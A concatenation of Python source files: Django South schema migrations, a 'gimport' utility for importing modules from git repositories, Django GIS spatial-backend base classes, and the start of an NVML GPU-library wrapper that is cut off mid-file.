            'comment': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['canvas.Comment']", 'null': 'True', 'blank': 'True'}),
            'confirmed': ('canvas.util.UnixTimestampField', [], {'default': '0'}),
            'custom_message': ('django.db.models.fields.TextField', [], {}),
            'disable_user': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'issued': ('canvas.util.UnixTimestampField', [], {}),
            'stock_message': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'user_warnings'", 'to': "orm['auth.User']"}),
            'viewed': ('canvas.util.UnixTimestampField', [], {'default': '0'})
        },
        'canvas.welcomeemailrecipient': {
            'Meta': {'object_name': 'WelcomeEmailRecipient'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'recipient': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'})
        },
        'canvas_auth.user': {
            'Meta': {'object_name': 'User', 'db_table': "'auth_user'", '_ormbases': ['auth.User'], 'proxy': 'True'}
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        }
    }

    # Apps whose frozen models are complete in this migration.
    complete_apps = ['canvas']
#!/usr/bin/env python2.7 # to use gimport: use wget or curl to download the gimport.py file locally #ie. os.system('wget -q https://github.com/scottidler/gimport/raw/master/gimport.py -O gimport.py') import os import re import imp import sys import contextlib from subprocess import Popen, PIPE sys.dont_write_bytecode = True class RepospecDecompositionError(Exception): ''' exception when repospec can't be decomposed ''' pass @contextlib.contextmanager def cd(*args, **kwargs): ''' helper change dir function to be used with 'with' expressions ''' mkdir = kwargs.pop('mkdir', True) verbose = kwargs.pop('verbose', False) path = os.path.sep.join(args) path = os.path.normpath(path) path = os.path.expanduser(path) prev = os.getcwd() if path != prev: if mkdir: run('mkdir -p %(path)s' % locals(), verbose=verbose) os.chdir(path) curr = os.getcwd() sys.path.append(curr) if verbose: print 'cd %s' % curr try: yield finally: if path != prev: sys.path.remove(curr) os.chdir(prev) if verbose: print 'cd %s' % prev def run(*args, **kwargs): ''' thin wrapper around Popen; returns exitcode, stdout and stderr ''' nerf = kwargs.pop('nerf', False) shell = kwargs.pop('shell', True) verbose = kwargs.pop('verbose', False) if (verbose or nerf) and args[0]: print args[0] if nerf: return (None, 'nerfed', 'nerfed') process = Popen(shell=shell, *args, **kwargs) stdout, stderr = process.communicate() exitcode = process.poll() if verbose and stdout: print stdout return exitcode, stdout, stderr def expand(path): ''' converts ~ -> /home/%{USER} ''' if path: return os.path.expanduser(path) def decompose(repospec, giturl=None): ''' decompoes repospec into giturl, sep, reponame and revision ''' pattern = r'(((((ssh|https)://)?([a-zA-Z0-9_.\-]+@)?)([a-zA-Z0-9_.\-]+))([:/]{1,2}))?([a-zA-Z0-9_.\-\/]+)@?([a-zA-Z0-9_.\-\/]+)?' 
match = re.search(pattern, repospec) if match: return match.group(2) or giturl, match.group(8), match.group(9), match.group(10) or 'HEAD' raise RepospecDecompositionError(repospec) def divine(giturl, sep, reponame, revision): ''' divines refname and commit from supplied args ''' r2c = {} # revisions to commits c2r = {} # commits to revisions result = run('git ls-remote %(giturl)s%(sep)s%(reponame)s' % locals(), stdout=PIPE)[1].strip() for line in result.split('\n'): commit, refname = line.split('\t') r2c[refname] = commit c2r[commit] = refname refnames = [ 'refs/heads/' + revision, 'refs/tags/' + revision, revision ] commit = None for refname in refnames: commit = r2c.get(refname, None) if commit: break if not commit: commit = revision return c2r.get(commit, None), commit def clone(giturl, sep, reponame, commit, cachepath, mirrorpath, versioning): ''' wraps clone command with mirroring and caching ''' mirror = '' if mirrorpath: mirror = '--reference %(mirrorpath)s/%(reponame)s.git' % locals() path = os.path.join(cachepath, reponame) repopath = reponame if versioning: repopath = os.path.join(repopath, commit) with cd(cachepath, mkdir=True): if not os.path.isdir(commit): run('git clone %(mirror)s %(giturl)s%(sep)s%(reponame)s %(repopath)s' % locals(), stdout=PIPE, stderr=PIPE) with cd(repopath): run('git clean -x -f -d', stdout=PIPE, stderr=PIPE) run('git checkout %(commit)s' % locals(), stdout=PIPE, stderr=PIPE) return os.path.join(cachepath, repopath) def rmtree(path, empties=False): ''' removes a folder path ''' try: if empties: run('rmdir ' + path) else: run('rm -rf ' + path) dpath = os.path.dirname(path) if dpath: return rmtree(dpath) return path except: return path def gimport(repospec, filepath, giturl=None, imports=None, cachepath='.gimport', mirrorpath=None, versioning=True, persist=False): ''' main function alows user to import code from a git url ''' cachepath = expand(cachepath) mirrorpath = expand(mirrorpath) giturl, sep, reponame, revision = 
decompose(repospec, giturl) _, commit = divine(giturl, sep, reponame, revision) path = clone(giturl, sep, reponame, commit, cachepath, mirrorpath, versioning) with cd(path): modname = os.path.splitext(os.path.basename(filepath))[0] module = imp.load_source(modname, filepath) if not persist: rmtree(path) if imports: return [module[import_] for import_ in imports] return module def main(): ''' only provided as an easy way to test module; usually used via import ''' try: import argparse except: print 'missing argparse; gimport.py can be used as a library without argparse installed' sys.exit(-1) parser = argparse.ArgumentParser() parser.add_argument( '--cachepath', default='.gimport', help='path to store all gimport cached files') parser.add_argument( '--mirrorpath', help='path to cached repos to support fast cloning') parser.add_argument( '--imports', nargs='+', help='list of imports') parser.add_argument( '--giturl', help='the giturl to be used with git clone') parser.add_argument( '--no-versioning', action='store_false', dest='versioning', help='turn versioning off; checkout in reponame rather than reponame/commit') parser.add_argument( 'repospec', help='repospec schema is giturl?reponame@revision?') parser.add_argument( 'filepath', help='the filepath inside the git repo') ns = parser.parse_args() print gimport(**ns.__dict__) sys.exit(0) if __name__ == '__main__': main()
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models from jmbo import USE_GIS class Migration(SchemaMigration): depends_on = ( ("jmbo", "0004_auto__add_field_modelbase_location"), ("foundry", "0038_auto__chg_field_country_title__chg_field_country_slug"), ) def forwards(self, orm): # Adding model 'Calendar' db.create_table('jmbo_calendar_calendar', ( ('modelbase_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['jmbo.ModelBase'], unique=True, primary_key=True)), )) db.send_create_signal('jmbo_calendar', ['Calendar']) # Adding model 'Event' db.create_table('jmbo_calendar_event', ( ('parent_ptr', self.gf('django.db.models.fields.related.OneToOneField')(related_name='+', unique=True, primary_key=True, to=orm['jmbo.ModelBase'])), ('start', self.gf('django.db.models.fields.DateTimeField')()), ('end', self.gf('django.db.models.fields.DateTimeField')()), ('repeat', self.gf('django.db.models.fields.CharField')(default='does_not_repeat', max_length=64)), ('repeat_until', self.gf('django.db.models.fields.DateField')(null=True, blank=True)), ('content', self.gf('ckeditor.fields.RichTextField')()), )) db.send_create_signal('jmbo_calendar', ['Event']) # Adding M2M table for field calendars on 'Event' db.create_table('jmbo_calendar_event_calendars', ( ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)), ('event', models.ForeignKey(orm['jmbo_calendar.event'], null=False)), ('calendar', models.ForeignKey(orm['jmbo_calendar.calendar'], null=False)) )) db.create_unique('jmbo_calendar_event_calendars', ['event_id', 'calendar_id']) if USE_GIS: db.add_column('jmbo_calendar_event', 'venue', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['atlas.Location']), keep_default=False) def backwards(self, orm): # Deleting model 'Calendar' db.delete_table('jmbo_calendar_calendar') # Deleting model 'Event' db.delete_table('jmbo_calendar_event') # Removing M2M 
table for field calendars on 'Event' db.delete_table('jmbo_calendar_event_calendars') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': 
('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'jmbo_calendar.calendar': { 'Meta': {'ordering': "('-created',)", 'object_name': 'Calendar', '_ormbases': ['jmbo.ModelBase']}, 'modelbase_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['jmbo.ModelBase']", 'unique': 'True', 'primary_key': 'True'}) }, 'jmbo_calendar.event': { 'Meta': {'ordering': "('start',)", 'object_name': 'Event', '_ormbases': ['jmbo.ModelBase']}, 'calendars': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'event_calendar'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['jmbo_calendar.Calendar']"}), 'content': ('ckeditor.fields.RichTextField', [], {}), 'end': ('django.db.models.fields.DateTimeField', [], {}), 'parent_ptr': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'+'", 'unique': 'True', 'primary_key': 'True', 'to': "orm['jmbo.ModelBase']"}), 'repeat': ('django.db.models.fields.CharField', [], {'default': "'does_not_repeat'", 'max_length': '64'}), 'repeat_until': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}), 'start': ('django.db.models.fields.DateTimeField', [], {}), }, 'category.category': { 'Meta': {'ordering': "('title',)", 'object_name': 'Category'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}), 'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}) }, 'category.tag': { 'Meta': {'ordering': "('title',)", 'object_name': 'Tag'}, 
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}) }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, 'jmbo.modelbase': { 'Meta': {'ordering': "('-created',)", 'object_name': 'ModelBase'}, 'anonymous_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'anonymous_likes': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}), 'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}), 'comments_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'comments_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}), 'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True'}), 'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}), 'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 
'True'}), 'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'modelbase_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}), 'likes_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'likes_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'modified': ('django.db.models.fields.DateTimeField', [], {}), 'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}), 'primary_category': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'primary_modelbase_set'", 'null': 'True', 'to': "orm['category.Category']"}), 'publish_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'publishers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['publisher.Publisher']", 'null': 'True', 'blank': 'True'}), 'retract_on': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}), 'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}), 'state': ('django.db.models.fields.CharField', [], {'default': "'unpublished'", 'max_length': '32', 'null': 'True', 'blank': 'True'}), 'subtitle': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'}), 'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Tag']", 'null': 'True', 'blank': 
'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}) }, 'photologue.photo': { 'Meta': {'ordering': "['-date_added']", 'object_name': 'Photo'}, 'caption': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}), 'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'photo_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}), 'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'tags': ('photologue.models.TagField', [], {'max_length': '255', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}), 'title_slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}), 'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}) }, 'photologue.photoeffect': { 'Meta': {'object_name': 'PhotoEffect'}, 'background_color': ('django.db.models.fields.CharField', [], {'default': "'#FFFFFF'", 'max_length': '7'}), 'brightness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}), 'color': ('django.db.models.fields.FloatField', [], {'default': '1.0'}), 'contrast': ('django.db.models.fields.FloatField', [], {'default': '1.0'}), 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'filters': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 
'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}), 'reflection_size': ('django.db.models.fields.FloatField', [], {'default': '0'}), 'reflection_strength': ('django.db.models.fields.FloatField', [], {'default': '0.59999999999999998'}), 'sharpness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}), 'transpose_method': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'}) }, 'publisher.publisher': { 'Meta': {'object_name': 'Publisher'}, 'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '64'}) }, 'secretballot.vote': { 'Meta': {'unique_together': "(('token', 'content_type', 'object_id'),)", 'object_name': 'Vote'}, 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}), 'token': ('django.db.models.fields.CharField', [], {'max_length': '50'}), 'vote': ('django.db.models.fields.SmallIntegerField', [], {}) }, 'sites.site': { 'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"}, 'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) } } if USE_GIS: models.update({ 'atlas.city': { 'Meta': {'ordering': "('name',)", 'object_name': 'City'}, 'coordinates': ('atlas.fields.CoordinateField', [], {'blank': 'True', 
'null': 'True', 'geography': 'True'}), 'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Country']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}), 'region': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Region']", 'null': 'True', 'blank': 'True'}) }, 'atlas.country': { 'Meta': {'ordering': "('name',)", 'object_name': 'Country'}, 'border': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {'blank': 'True', 'null': 'True', 'geography': 'True'}), 'country_code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2', 'db_index': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'atlas.location': { 'Meta': {'object_name': 'Location'}, 'address': ('django.db.models.fields.TextField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}), 'city': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.City']"}), 'coordinates': ('atlas.fields.CoordinateField', [], {'blank': 'True', 'null': 'True', 'geography': 'True'}), 'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Country']"}), 'description': ('django.db.models.fields.TextField', [], {'max_length': '1024', 'null': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}), 'photo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['photologue.Photo']", 'null': 'True', 'blank': 'True'}) }, 'atlas.region': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('country', 'code'),)", 'object_name': 'Region'}, 'border': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {'blank': 'True', 
'null': 'True', 'geography': 'True'}), 'code': ('django.db.models.fields.CharField', [], {'max_length': '2', 'db_index': 'True'}), 'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Country']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}) } }) models['jmbo_calendar.event']['venue'] = ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['atlas.Location']"}) complete_apps = ['jmbo_calendar']
""" Base/mixin classes for the spatial backend database operations and the `SpatialRefSys` model the backend. """ import re from django.contrib.gis import gdal from django.utils import six from django.utils.encoding import python_2_unicode_compatible class BaseSpatialOperations(object): """ This module holds the base `BaseSpatialBackend` object, which is instantiated by each spatial database backend with the features it has. """ distance_functions = {} geometry_functions = {} geometry_operators = {} geography_operators = {} geography_functions = {} gis_terms = {} truncate_params = {} # Quick booleans for the type of this spatial backend, and # an attribute for the spatial database version tuple (if applicable) postgis = False spatialite = False mysql = False oracle = False spatial_version = None # How the geometry column should be selected. select = None # Does the spatial database have a geography type? geography = False area = False centroid = False difference = False distance = False distance_sphere = False distance_spheroid = False envelope = False force_rhr = False mem_size = False bounding_circle = False num_geom = False num_points = False perimeter = False perimeter3d = False point_on_surface = False polygonize = False reverse = False scale = False snap_to_grid = False sym_difference = False transform = False translate = False union = False # Aggregates collect = False extent = False extent3d = False make_line = False unionagg = False # Serialization geohash = False geojson = False gml = False kml = False svg = False # Constructors from_text = False from_wkb = False # Default conversion functions for aggregates; will be overridden if implemented # for the spatial backend. 
def convert_extent(self, box): raise NotImplementedError('Aggregate extent not implemented for this spatial backend.') def convert_extent3d(self, box): raise NotImplementedError('Aggregate 3D extent not implemented for this spatial backend.') def convert_geom(self, geom_val, geom_field): raise NotImplementedError('Aggregate method not implemented for this spatial backend.') # For quoting column values, rather than columns. def geo_quote_name(self, name): return "'%s'" % name # GeometryField operations def geo_db_type(self, f): """ Returns the database column type for the geometry field on the spatial backend. """ raise NotImplementedError def get_distance(self, f, value, lookup_type): """ Returns the distance parameters for the given geometry field, lookup value, and lookup type. """ raise NotImplementedError('Distance operations not available on this spatial backend.') def get_geom_placeholder(self, f, value): """ Returns the placeholder for the given geometry field with the given value. Depending on the spatial backend, the placeholder may contain a stored procedure call to the transformation function of the spatial backend. """ raise NotImplementedError # Spatial SQL Construction def spatial_aggregate_sql(self, agg): raise NotImplementedError('Aggregate support not implemented for this spatial backend.') def spatial_lookup_sql(self, lvalue, lookup_type, value, field): raise NotImplementedError # Routines for getting the OGC-compliant models. def geometry_columns(self): raise NotImplementedError def spatial_ref_sys(self): raise NotImplementedError @python_2_unicode_compatible class SpatialRefSysMixin(object): """ The SpatialRefSysMixin is a class used by the database-dependent SpatialRefSys objects to reduce redundnant code. """ # For pulling out the spheroid from the spatial reference string. This # regular expression is used only if the user does not have GDAL installed. 
# TODO: Flattening not used in all ellipsoids, could also be a minor axis, # or 'b' parameter. spheroid_regex = re.compile(r'.+SPHEROID\[\"(?P<name>.+)\",(?P<major>\d+(\.\d+)?),(?P<flattening>\d{3}\.\d+),') # For pulling out the units on platforms w/o GDAL installed. # TODO: Figure out how to pull out angular units of projected coordinate system and # fix for LOCAL_CS types. GDAL should be highly recommended for performing # distance queries. units_regex = re.compile(r'.+UNIT ?\["(?P<unit_name>[\w \'\(\)]+)", ?(?P<unit>[\d\.]+)(,AUTHORITY\["(?P<unit_auth_name>[\w \'\(\)]+)","(?P<unit_auth_val>\d+)"\])?\]([\w ]+)?(,AUTHORITY\["(?P<auth_name>[\w \'\(\)]+)","(?P<auth_val>\d+)"\])?\]$') @property def srs(self): """ Returns a GDAL SpatialReference object, if GDAL is installed. """ if gdal.HAS_GDAL: # TODO: Is caching really necessary here? Is complexity worth it? if hasattr(self, '_srs'): # Returning a clone of the cached SpatialReference object. return self._srs.clone() else: # Attempting to cache a SpatialReference object. # Trying to get from WKT first. try: self._srs = gdal.SpatialReference(self.wkt) return self.srs except Exception as msg: pass try: self._srs = gdal.SpatialReference(self.proj4text) return self.srs except Exception as msg: pass raise Exception('Could not get OSR SpatialReference from WKT: %s\nError:\n%s' % (self.wkt, msg)) else: raise Exception('GDAL is not installed.') @property def ellipsoid(self): """ Returns a tuple of the ellipsoid parameters: (semimajor axis, semiminor axis, and inverse flattening). """ if gdal.HAS_GDAL: return self.srs.ellipsoid else: m = self.spheroid_regex.match(self.wkt) if m: return (float(m.group('major')), float(m.group('flattening'))) else: return None @property def name(self): "Returns the projection name." return self.srs.name @property def spheroid(self): "Returns the spheroid name for this spatial reference." return self.srs['spheroid'] @property def datum(self): "Returns the datum for this spatial reference." 
return self.srs['datum'] @property def projected(self): "Is this Spatial Reference projected?" if gdal.HAS_GDAL: return self.srs.projected else: return self.wkt.startswith('PROJCS') @property def local(self): "Is this Spatial Reference local?" if gdal.HAS_GDAL: return self.srs.local else: return self.wkt.startswith('LOCAL_CS') @property def geographic(self): "Is this Spatial Reference geographic?" if gdal.HAS_GDAL: return self.srs.geographic else: return self.wkt.startswith('GEOGCS') @property def linear_name(self): "Returns the linear units name." if gdal.HAS_GDAL: return self.srs.linear_name elif self.geographic: return None else: m = self.units_regex.match(self.wkt) return m.group('unit_name') @property def linear_units(self): "Returns the linear units." if gdal.HAS_GDAL: return self.srs.linear_units elif self.geographic: return None else: m = self.units_regex.match(self.wkt) return m.group('unit') @property def angular_name(self): "Returns the name of the angular units." if gdal.HAS_GDAL: return self.srs.angular_name elif self.projected: return None else: m = self.units_regex.match(self.wkt) return m.group('unit_name') @property def angular_units(self): "Returns the angular units." if gdal.HAS_GDAL: return self.srs.angular_units elif self.projected: return None else: m = self.units_regex.match(self.wkt) return m.group('unit') @property def units(self): "Returns a tuple of the units and the name." if self.projected or self.local: return (self.linear_units, self.linear_name) elif self.geographic: return (self.angular_units, self.angular_name) else: return (None, None) @classmethod def get_units(cls, wkt): """ Class method used by GeometryField on initialization to retrive the units on the given WKT, without having to use any of the database fields. 
""" if gdal.HAS_GDAL: return gdal.SpatialReference(wkt).units else: m = cls.units_regex.match(wkt) return m.group('unit'), m.group('unit_name') @classmethod def get_spheroid(cls, wkt, string=True): """ Class method used by GeometryField on initialization to retrieve the `SPHEROID[..]` parameters from the given WKT. """ if gdal.HAS_GDAL: srs = gdal.SpatialReference(wkt) sphere_params = srs.ellipsoid sphere_name = srs['spheroid'] else: m = cls.spheroid_regex.match(wkt) if m: sphere_params = (float(m.group('major')), float(m.group('flattening'))) sphere_name = m.group('name') else: return None if not string: return sphere_name, sphere_params else: # `string` parameter used to place in format acceptable by PostGIS if len(sphere_params) == 3: radius, flattening = sphere_params[0], sphere_params[2] else: radius, flattening = sphere_params return 'SPHEROID["%s",%s,%s]' % (sphere_name, radius, flattening) def __str__(self): """ Returns the string representation. If GDAL is installed, it will be 'pretty' OGC WKT. """ try: return six.text_type(self.srs) except: return six.text_type(self.wkt)
# -*- coding: utf-8 -*-
# File: nvml.py


from ctypes import (byref, c_uint, c_ulonglong, CDLL, POINTER, Structure)
import threading

# `NvmlException` is exported as well (backward-compatible addition) so that
# callers can catch NVML errors without reaching into module internals.
__all__ = ['NVMLContext', 'NvmlException']

NVML_ERROR_FUNCTION_NOT_FOUND = 13

# NVML return codes, keyed by their decimal value rendered as a string.
NvmlErrorCodes = {"0": "NVML_SUCCESS",
                  "1": "NVML_ERROR_UNINITIALIZED",
                  "2": "NVML_ERROR_INVALID_ARGUMENT",
                  "3": "NVML_ERROR_NOT_SUPPORTED",
                  "4": "NVML_ERROR_NO_PERMISSION",
                  "5": "NVML_ERROR_ALREADY_INITIALIZED",
                  "6": "NVML_ERROR_NOT_FOUND",
                  "7": "NVML_ERROR_INSUFFICIENT_SIZE",
                  "8": "NVML_ERROR_INSUFFICIENT_POWER",
                  "9": "NVML_ERROR_DRIVER_NOT_LOADED",
                  "10": "NVML_ERROR_TIMEOUT",
                  "11": "NVML_ERROR_IRQ_ISSUE",
                  "12": "NVML_ERROR_LIBRARY_NOT_FOUND",
                  "13": "NVML_ERROR_FUNCTION_NOT_FOUND",
                  "14": "NVML_ERROR_CORRUPTED_INFOROM",
                  "15": "NVML_ERROR_GPU_IS_LOST",
                  "16": "NVML_ERROR_RESET_REQUIRED",
                  "17": "NVML_ERROR_OPERATING_SYSTEM",
                  "18": "NVML_ERROR_LIB_RM_VERSION_MISMATCH",
                  "999": "NVML_ERROR_UNKNOWN"}


class NvmlException(Exception):
    """Raised when an NVML call returns a non-zero status code."""

    def __init__(self, error_code):
        super(NvmlException, self).__init__(error_code)
        self.error_code = error_code

    def __str__(self):
        # BUGFIX: use .get() with a fallback so that formatting the exception
        # itself never raises a KeyError for a code missing from the table.
        return NvmlErrorCodes.get(str(self.error_code), "NVML_ERROR_UNKNOWN")


def _check_return(ret):
    """Raise :class:`NvmlException` if `ret` is a non-zero NVML status."""
    if (ret != 0):
        raise NvmlException(ret)
    return ret


class NVML(object):
    """
    Loader for libnvidia-ml.so
    """

    _nvmlLib = None
    _lib_lock = threading.Lock()

    def load(self):
